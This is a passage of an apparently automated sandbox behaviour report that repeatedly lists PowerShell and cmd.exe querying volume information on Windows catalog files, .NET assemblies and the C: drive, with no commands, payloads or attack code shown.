Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\cmd.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\cmd.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
